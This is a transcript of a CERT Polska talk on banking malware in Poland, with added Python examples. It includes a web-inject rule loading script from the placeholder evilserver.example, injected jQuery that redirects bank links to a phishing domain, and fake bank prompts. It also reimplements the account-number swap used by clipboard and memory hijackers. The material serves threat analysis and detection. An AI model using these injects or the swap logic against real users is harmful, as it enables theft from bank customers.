
The Polish Money Stealing Scene

piotrk
February 05, 2015


Transcript

1. The Polish Money Stealing Scene

   Piotr Kijewski, [email protected], @piotrkijewski
   29th Jan 2015
2. Main actors

   • Web-inject malware
   • Hacked home routers
   • Home-grown "middle income" "banking" malware that introduces new tricks
3. Supporting actor

   • Classic phishing still there
   • About 20 or so campaigns against Polish banks in 2014
   • Not so effective against two-factor authentication … but they do collect data
   • Widely reported in media, so bad PR for a bank
4. Web-inject

   Target URL: "*/our internet bank/*"

   data_before
       <head>
   data_after
       <body>
   data_inject
       <script type="text/javascript" src="https://evilserver.example/grabmoney.js">
       </script>
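The slide shows the three fields of a web-inject rule but not how the bot applies them to the page it has just downloaded, nor what a defender could look for afterwards. The following is an added example, not code from the talk or from any malware family: it applies the slide's rule to a constructed bank page and then lists script sources that are not on the bank's own host. The replacement semantics (the text between the end of data_before and the start of data_after is replaced by data_inject; an empty data_after means insert directly after data_before) follow the classic Zeus webinject format and are an assumption here, since the slide does not state them. The page, URL and allowlist are constructed.

```python
"""Zeus-style web-inject applied to a downloaded page, plus a defender-side check.

Added example, not code from the talk.  Assumed semantics: the HTML between
the end of data_before and the start of data_after is replaced by data_inject;
an empty data_after means "insert right after data_before".  The victim page,
URL and allowlist below are constructed.
"""
from __future__ import annotations

import fnmatch
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlparse


@dataclass
class WebInject:
    url_pattern: str   # glob matched against the URL of the fetched page
    data_before: str
    data_after: str
    data_inject: str


# The slide's rule, transcribed; evilserver.example is the talk's placeholder.
SLIDE_INJECT = WebInject(
    url_pattern="*/our internet bank/*",
    data_before="<head>",
    data_after="<body>",
    data_inject='<script type="text/javascript" '
                'src="https://evilserver.example/grabmoney.js"></script>',
)

# Constructed victim page, not any real bank's HTML.
BANK_URL = "https://bank.example/our internet bank/login"
BANK_HTML = (
    "<html><head><title>Login</title>"
    '<script src="https://bank.example/static/app.js"></script></head>'
    "<body><form action=/login>...</form></body></html>"
)


def apply_inject(html: str, inj: WebInject) -> tuple[str, bool]:
    """Return (modified_html, hit). html is left untouched if an anchor is missing."""
    start = html.find(inj.data_before)
    if start == -1:
        return html, False
    start += len(inj.data_before)
    if inj.data_after:
        end = html.find(inj.data_after, start)
        if end == -1:
            return html, False
    else:
        end = start
    return html[:start] + inj.data_inject + html[end:], True


def apply_injects(url: str, html: str, injects: list[WebInject]) -> tuple[str, int]:
    """Apply every rule whose URL glob matches; return the html and the hit count."""
    hits = 0
    for inj in injects:
        if fnmatch.fnmatchcase(url, inj.url_pattern):
            html, hit = apply_inject(html, inj)
            hits += hit
    return html, hits


class _ScriptSrcCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.srcs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def foreign_script_hosts(html: str, allowed_hosts: set[str]) -> list[str]:
    """Hosts of <script src> that are not on the bank's allowlist: the kind of
    thing a page-integrity check or a proxy log review would flag after an inject."""
    p = _ScriptSrcCollector()
    p.feed(html)
    hosts = {urlparse(s).hostname for s in p.srcs}
    return sorted(h for h in hosts if h not in allowed_hosts)


if __name__ == "__main__":
    injected, n = apply_injects(BANK_URL, BANK_HTML, [SLIDE_INJECT])
    print(n, "inject(s) applied")
    print(injected)
    print("foreign script hosts:", foreign_script_hosts(injected, {"bank.example"}))
```

Note what the slide's anchors do under these semantics: everything between `<head>` and `<body>` (the bank's own title, stylesheets and scripts) is replaced by the attacker's script tag. Real configs are usually narrower, with a short data_before and an empty data_after, so the page keeps working and nothing looks broken to the user.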
5. Scenarios

   • Web-inject scenarios are at the core of money theft
   • Bad guys test transaction systems for elements that they can leverage in scenarios
   • Bad guys monitor financial sector news & events to adapt scenarios
   • Goal is to bypass two-factor authentication by exploiting the user
6. "Defined bank transfer"

   The Bank is changing the format of the account. Please confirm the operation, including the new account number should be specified as a recipient defined. New account number will be active after 7 days if the operation is not confirmed, the adoption of transfers on your account will be impossible. Please enter the code SMS number: 334

   Note: Translation reflects original crappy Polish text
7. "Insurance"

   Because of the growing prevalence of fraudulent transactions from accounts of customers all internet bank payments must be insured.
   payment amount for 300000zł - free
   payment amount over 300000zł - 50 zł

   Note: Translation reflects original crappy Polish text
8. "Cannot identify your computer"

   The alarm system is not able to identify your computer. This may be due to a recent software update or a new IP address assigned by your ISP. In this case, you must authenticate the computer to avoid blocking the account. Please authorization by the token.

   Note: Translation reflects original crappy Polish text
9. "Trusted phone number"

   We are updating the phone bank for sms code of <insert bank name> banking system to the safety of our customers we introduce secure line connection. You need to activate the new code SMS We take care of the safety of the banking system <insert bank name>

   Note: Translation reflects original crappy Polish text
10. PowerZeus/KINS

   • Started targeting Polish users around July 2013
   • Combines 3 features: webinjects (Zeus), plugin API (SpyEye), code injection methods used by Power Loader (Alureon)
   • Modules downloaded by framework (essentially what PowerZeus is)
   • Included a module we called zeus-dll (encrypted on disk)
   • This particular instance aimed at installing poland.apk, polska.apk, e-security.apk on an Android device
   • This instance used .ru domains for C&C and .pl domains for malicious app distribution
11. Command features … + steganography

   • get info
     – starts with #, phone no. somewhere in message
   • new number
     – starts with /, phone no. somewhere in message
   • fin
     – starts with ,
   • uninstall
     – starts with !

   +34 668 …
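The slide gives the SMS command set of the Android component only as a first character plus "phone no. somewhere in message". The following is an added example, not code from the talk or from the malware: a parser for that command format as described, usable for sorting the SMS store of an infected handset into operator commands and ordinary traffic. The exact message layout, the phone-number pattern, and the rule that a get-info or new-number command without a phone number is ignored are assumptions; the sample messages are constructed.

```python
"""Parser for the SMS command format described on the slide.

Added example, not code from the talk or the malware.  Only the leading
marker per command and "phone number somewhere in the message" come from
the slide; the number pattern and the sample messages are assumptions.
"""
import re
from typing import List, Optional, Tuple

COMMANDS = {
    "#": "get_info",     # report device info to the number in the message
    "/": "new_number",   # change the number that intercepted SMS codes go to
    ",": "fin",          # stop
    "!": "uninstall",
}

# Assumed: optional '+', 8-20 characters of digits, spaces or dashes, digit at both ends.
PHONE_RE = re.compile(r"\+?\d[\d\s-]{6,18}\d")


def extract_phone(text: str) -> Optional[str]:
    """First phone-number-looking token, normalised to digits (keeping a leading +)."""
    m = PHONE_RE.search(text)
    if not m:
        return None
    return re.sub(r"[\s-]", "", m.group(0))


def parse_command(sms: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (command, phone), or (None, None) if the SMS is not a command.

    get_info and new_number need a number to act on; without one the
    message is treated as ordinary text, so a user's own SMS that happens
    to start with '#' is not mistaken for a command.
    """
    text = sms.lstrip()
    if not text:
        return None, None
    cmd = COMMANDS.get(text[0])
    if cmd is None:
        return None, None
    phone = extract_phone(text[1:])
    if cmd in ("get_info", "new_number") and phone is None:
        return None, None
    return cmd, phone


def find_commands(messages: List[str]) -> List[Tuple[str, str, Optional[str]]]:
    """Triage a list of SMS bodies: keep only the ones that parse as commands."""
    out = []
    for sms in messages:
        cmd, phone = parse_command(sms)
        if cmd is not None:
            out.append((sms, cmd, phone))
    return out


# Constructed messages, not captures from a real device.
SAMPLES = [
    "# +48 600 123 456 send info",
    "/ new number +34 668 000 111",
    ",",
    "!",
    "Your one-time code is 334",
    "#see you at 7",
]

if __name__ == "__main__":
    for sms, cmd, phone in find_commands(SAMPLES):
        print(f"{cmd:<11} {phone or '-':<14} {sms!r}")
```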
12. Sinkhole stats, unique IPs/day

   Sample date: 12/11/2013
   Takedown together with Kaspersky
13. Scenario 1

   The following code was injected in downloaded HTML:

   <script>
   jQuery(document).ready(function() {
     jQuery('a[href*="ebgz.pl"]').attr('href', 'http://ssl-.ebgz.pl/');
     jQuery('li p a.button.green').attr('href', 'http://ssl-.ebgz.pl/');
   });
   </script>
14. Bank Account Number (BAN)

   CCAAAAAAAABBBBBBBBBBBBBBBB
   CC AAAA AAAA BBBB BBBB BBBB BBBB

   • CC: control sum (in line with IBAN standard)
   • A: bank number
   • B: account number
15. VBKlip / Banapter

   • A simple piece of VB (later variants in .NET) that alters the contents of the Windows clipboard.
   • Any string of 26 digits (optionally separated by whitespace) is changed to another one.
   • Early versions had the account number hardcoded; currently it's updated from a C2 server.
16. Banatrix

   • Banatrix scans memory of running processes that match iexplore.exe, firefox.exe, chrome.exe, and opera.exe.
   • Similar to VBKlip/Banapter, Banatrix changes 26-digit strings to a different one.
   • Monitoring limited to one browser process; may crash browser.
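Slides 14 to 16 together explain the trick: the 26-digit account number has an IBAN-style control sum, and VBKlip/Banapter and Banatrix simply replace any 26-digit string they see with the mule's number. The following is an added example, not code from the talk or from the malware: it computes and checks the control sum exactly as the IBAN rule prescribes for a "PL" prefix, and reproduces the substitution as the slides describe it (26 digits, optionally whitespace-separated, replaced while keeping the victim's digit grouping). The bank prefixes are illustrative and the account parts are made up, with check digits computed by the code itself; nothing here is a real account.

```python
"""Polish account number (NRB) control sum, and the 26-digit swap that
VBKlip/Banapter (clipboard) and Banatrix (browser memory) perform.

Added example, not code from the talk or the malware.  Checksum: IBAN
mod-97 with the "PL" country code (P=25, L=21), as the slide states.
Account numbers are constructed; check digits come from nrb_check_digits().
"""
import re

PL_PREFIX = "2521"   # "PL" in the IBAN letter-to-digit mapping


def _mod97(digits: str) -> int:
    """Mod 97 of an arbitrarily long decimal string, digit by digit."""
    r = 0
    for d in digits:
        r = (r * 10 + int(d)) % 97
    return r


def normalize(nrb: str) -> str:
    """Strip whitespace and an optional leading 'PL'."""
    s = re.sub(r"\s+", "", nrb)
    return s[2:] if s.upper().startswith("PL") else s


def nrb_check_digits(bban: str) -> str:
    """Control sum CC for a 24-digit bank+account part (IBAN generation rule)."""
    if len(bban) != 24 or not bban.isdigit():
        raise ValueError("BBAN must be 24 digits")
    return f"{98 - _mod97(bban + PL_PREFIX + '00'):02d}"


def validate_nrb(nrb: str) -> bool:
    """True if the 26 digits pass the IBAN check for country code PL."""
    s = normalize(nrb)
    if len(s) != 26 or not s.isdigit():
        return False
    return _mod97(s[2:] + PL_PREFIX + s[:2]) == 1


def split_nrb(nrb: str) -> dict:
    """CC / bank number / account number, as laid out on slide 14."""
    s = normalize(nrb)
    return {"control": s[:2], "bank": s[2:10], "account": s[10:]}


# 26 digits, optionally separated by whitespace, not part of a longer digit run.
ACCOUNT_RE = re.compile(r"(?<!\d)\d(?:\s*\d){25}(?!\d)")


def swap_accounts(text: str, attacker_nrb: str) -> str:
    """The malware's rewrite: every 26-digit number in text becomes the
    attacker's, keeping the victim's whitespace so the pasted value
    looks unchanged at a glance."""
    attacker = normalize(attacker_nrb)
    if len(attacker) != 26 or not attacker.isdigit():
        raise ValueError("attacker account must be 26 digits")

    def repl(m: "re.Match[str]") -> str:
        digits = iter(attacker)
        return "".join(next(digits) if ch.isdigit() else ch for ch in m.group(0))

    return ACCOUNT_RE.sub(repl, text)


# Constructed numbers: illustrative bank prefixes, made-up account parts.
VICTIM_BBAN = "102010260000170202701234"
ATTACKER_BBAN = "109010140000071201112233"
VICTIM_NRB = nrb_check_digits(VICTIM_BBAN) + VICTIM_BBAN        # 77 1020 1026 ...
ATTACKER_NRB = nrb_check_digits(ATTACKER_BBAN) + ATTACKER_BBAN  # 67 1090 1014 ...

if __name__ == "__main__":
    clipboard = "Odbiorca: 77 1020 1026 0000 1702 0270 1234 tytul FV/12"
    print(clipboard)
    print(swap_accounts(clipboard, ATTACKER_NRB))
```

Both the victim's and the mule's numbers pass validate_nrb, which is the point: the control sum catches typos, not substitution, so neither the bank's form nor the user can rely on it to notice the swap. The only check that works is comparing the pasted number digit by digit with the invoice, which is what the slide-15 grouping-preserving rewrite is designed to defeat at a glance.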
17. Future winner?

   • Ransomware
     – Older Weelsof/Reveton in 2011/12 had massive impact
     – Interestingly, nothing much since then
     – Cryptolocker, Cryptowall not really present
   • But it will be bad when it hits
18. Contact: [email protected], [email protected]
    Twitter: @piotrkijewski, @cert_polska_en
    Web: www.cert.pl